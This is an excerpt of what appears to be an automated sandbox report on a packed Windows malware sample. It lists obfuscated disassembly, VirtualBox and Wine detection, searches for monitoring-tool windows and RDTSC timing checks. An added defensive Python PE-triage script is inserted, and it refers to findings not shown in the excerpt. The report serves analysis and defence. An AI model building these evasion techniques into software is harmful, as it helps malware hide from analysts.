Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push eax; mov dword ptr [esp], 7EDD835Ch 0_2_00A0D42E
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax 0_2_00A0D464
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax 0_2_00A0D47F
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push ecx; mov dword ptr [esp], 7BF5FF9Ch 0_2_00A0D483
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 66E731C2h; mov dword ptr [esp], edx 0_2_00A0D4C8
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax 0_2_00A0D4CC
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push eax; mov dword ptr [esp], esi 0_2_00A0D518
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 310F477Fh; mov dword ptr [esp], esp 0_2_00A0D520
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push esi; mov dword ptr [esp], edx 0_2_00A0D58B
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 07A77AC7h; mov dword ptr [esp], ecx 0_2_00A0D65A
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00A0D02A push 05B64D79h; mov dword ptr [esp], edi 0_2_00A0D662
Source: XDPT5mgIBO.exe Static PE information: section name: ogawuknu entropy: 7.953433173066681
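The static findings in this block (non-standard and empty section names, sections mapped writable and executable, an entry point in .taggant rather than a standard code section, a section with entropy 7.95 and a header checksum that does not match) are the classic fingerprint of a packed executable. The following script is an added example, not Joe Sandbox code: it reads the PE32 headers and section table with the Python standard library only and reports exactly those checks. It is exercised on a constructed minimal PE that mimics this sample's layout (a plain .text section plus a packed, writable and executable section holding the entry point, and CheckSum left at zero); the 7.9 entropy cut-off and the section-name whitelist are assumptions of the example, not values from the report.

```python
"""Static PE triage for the findings above: odd section names, W+X sections,
entry point outside standard sections, section entropy, header checksum.

Added example (not Joe Sandbox code); stdlib only, PE32 only. The sample PE
built by build_sample_pe() is constructed for demonstration, not the report's
file. HIGH_ENTROPY and STANDARD_SECTIONS are assumed values.
"""
import math
import struct
from typing import Dict, List

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}
HIGH_ENTROPY = 7.9  # assumed cut-off; this sample's packed section scores 7.95


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 is uniformly random, as packed or encrypted data looks."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in (data.count(b) for b in set(data)))


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """imagehlp-style folded 16-bit sum plus file length. The CheckSum dword is
    skipped, so a correctly stamped file reproduces its own header value.
    Assumes checksum_offset is 4-byte aligned (true for linker output)."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(0, len(padded), 4):
        if i == checksum_offset:
            continue
        total += int.from_bytes(padded[i:i + 4], "little")
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def triage_pe(data: bytes) -> Dict[str, object]:
    """Parse COFF header, PE32 optional header and section table; run the checks."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    checksum_off = opt + 64
    declared = struct.unpack_from("<I", data, checksum_off)[0]
    sections: List[Dict[str, object]] = []
    for i in range(num_sections):
        off = opt + opt_size + 40 * i
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),   # empty name -> ""
            "rva": vaddr, "span": max(vsize, rawsize),
            "entropy": shannon_entropy(data[rawptr:rawptr + rawsize]),
            "exec": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "write": bool(chars & IMAGE_SCN_MEM_WRITE),
        })
    entry = next((s for s in sections if s["rva"] <= entry_rva < s["rva"] + s["span"]), None)
    entry_name = entry["name"] if entry else None
    computed = pe_checksum(data, checksum_off)
    return {
        "non_standard_sections": [s["name"] for s in sections if s["name"] not in STANDARD_SECTIONS],
        "writable_executable": [s["name"] for s in sections if s["exec"] and s["write"]],
        "high_entropy": [s["name"] for s in sections if s["entropy"] >= HIGH_ENTROPY],
        "entry_section": entry_name,
        "entry_outside_standard": entry_name not in STANDARD_SECTIONS,
        "checksum_declared": declared, "checksum_computed": computed,
        "checksum_ok": declared == computed,
    }


def stamp_checksum(data: bytes) -> bytes:
    """Write the computed checksum into the header, as a linker would."""
    off = struct.unpack_from("<I", data, 0x3C)[0] + 4 + 20 + 64
    out = bytearray(data)
    struct.pack_into("<I", out, off, pe_checksum(data, off))
    return bytes(out)


def build_sample_pe() -> bytes:
    """Constructed PE32 (not the analysed file): plain .text, then a packed
    'ogawuknu'-style RWX section holding the entry point; CheckSum left at 0."""
    headers_size = 0x200
    secs = [  # (name, RVA, raw bytes, characteristics)
        (b".text", 0x1000, b"\x90" * 0x100 + b"\xc3",
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b"ogawuknu", 0x2000, bytes(range(256)) * 2,       # uniform bytes: entropy 8.0
         IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 0xE0, 0x0102)  # i386, EXECUTABLE_IMAGE|32BIT_MACHINE
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2000)                        # AddressOfEntryPoint in packed section
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)     # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x3000, headers_size)         # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    table, blobs, raw_ptr = b"", b"", headers_size
    for name, rva, raw, chars in secs:
        padded = raw + b"\0" * (-len(raw) % 0x200)
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), rva, len(padded), raw_ptr, 0, 0, 0, 0, chars)
        blobs += padded
        raw_ptr += len(padded)
    header = dos + b"PE\0\0" + coff + bytes(opt) + table
    return header + b"\0" * (headers_size - len(header)) + blobs


if __name__ == "__main__":
    print(triage_pe(build_sample_pe()))
```

On the constructed file the report lists ogawuknu as non-standard, writable and executable, high-entropy and the owner of the entry point, and flags the zero checksum as not matching the computed one; after stamp_checksum() the same file verifies. To run it on a real sample, pass the file's bytes to triage_pe(); none of the findings on its own proves malice (installers and protected commercial software trip several), but this combination, seen here together with the runtime unpacking and section-rights change noted in the first line of this block, is what the sandbox's packing verdict rests on.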

Boot Survival

Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00659860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1B6E3 second address: A1B6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DD94 second address: A1DD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DD99 second address: A1DD9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DD9E second address: A1DDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DDA4 second address: A1DDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA3D4C68E67h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DEB1 second address: A1DEB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DEB5 second address: A1DEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DEC3 second address: A1DEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA3D4D82106h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4D82112h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DEE2 second address: A1DEF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1DEF1 second address: A1DF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jno 00007FA3D4D82121h 0x00000010 pop eax 0x00000011 jp 00007FA3D4D82109h 0x00000017 movzx edi, cx 0x0000001a lea ebx, dword ptr [ebp+1244FBBCh] 0x00000020 jmp 00007FA3D4D8210Eh 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jbe 00007FA3D4D8210Ch 0x0000002e jc 00007FA3D4D82106h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1E17D second address: A1E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A3EA92 second address: A3EAAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA3B second address: A7DA41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA41 second address: A7DA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA45 second address: A7DA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FA3D4D8211Dh 0x0000000c jmp 00007FA3D4D82117h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA68 second address: A7DA83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA3D4C68E56h 0x0000000a jmp 00007FA3D4C68E61h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA83 second address: A7DA8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA8D second address: A7DA91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8620C second address: A86210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A86210 second address: A86234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4C68E67h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A86234 second address: A86238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84EF0 second address: A84EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84EF6 second address: A84F1C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 jmp 00007FA3D4D82114h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FA3D4D82112h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84F1C second address: A84F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA3D4C68E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84F26 second address: A84F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D8210Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84F34 second address: A84F5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 jl 00007FA3D4C68E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FA3D4C68E5Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8522D second address: A85242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82111h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A854E7 second address: A854F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A854F1 second address: A85507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jns 00007FA3D4D82106h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A85507 second address: A85516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FA3D4C68E5Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A85AE6 second address: A85AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A88E3A second address: A88E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A88E43 second address: A88E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA3D4D82106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A07B2D second address: A07B32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8E111 second address: A8E129 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e jg 00007FA3D4D8210Eh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A36A09 second address: A36A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A36A10 second address: A36A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82115h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8F085 second address: A8F097 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4C68E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8F097 second address: A8F0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3D4D82113h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8F0B1 second address: A8F0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8DA08 second address: A8DA17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8DA17 second address: A8DA28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA3D4C68E56h 0x00000009 jno 00007FA3D4C68E56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8DA28 second address: A8DA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A944C3 second address: A944CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FA3D4C68E56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9342C second address: A93430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A93430 second address: A93476 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FA3D4C68E64h 0x00000012 jmp 00007FA3D4C68E5Eh 0x00000017 jmp 00007FA3D4C68E5Ah 0x0000001c jg 00007FA3D4C68E56h 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A93476 second address: A93491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4D82110h 0x00000008 jg 00007FA3D4D82106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A93491 second address: A9349F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jnp 00007FA3D4C68E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5701D second address: A35EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FA3D4D82116h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FA3D4D82108h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D355Fh] 0x0000002e call 00007FA3D4D8210Fh 0x00000033 call 00007FA3D4D8210Dh 0x00000038 mov dword ptr [ebp+122D36CCh], ecx 0x0000003e pop edi 0x0000003f pop ecx 0x00000040 lea eax, dword ptr [ebp+12488E64h] 0x00000046 mov edx, dword ptr [ebp+122D2284h] 0x0000004c push eax 0x0000004d jmp 00007FA3D4D82114h 0x00000052 mov dword ptr [esp], eax 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007FA3D4D82108h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f call dword ptr [ebp+122D38D1h] 0x00000075 push ecx 0x00000076 push eax 0x00000077 push edx 0x00000078 push edx 0x00000079 pop edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57289 second address: A572B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA3D4C68E5Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A575DE second address: A575E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A575E4 second address: A575E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57696 second address: A576C7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA3D4D8210Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f push edi 0x00000010 jmp 00007FA3D4D8210Eh 0x00000015 pop edi 0x00000016 pop edi 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A576C7 second address: A576CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A576CB second address: A576FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jp 00007FA3D4D82112h 0x00000011 pop eax 0x00000012 and ch, FFFFFFB9h 0x00000015 mov edi, eax 0x00000017 push 8DD05BBCh 0x0000001c pushad 0x0000001d jbe 00007FA3D4D8210Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A576FC second address: A57703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
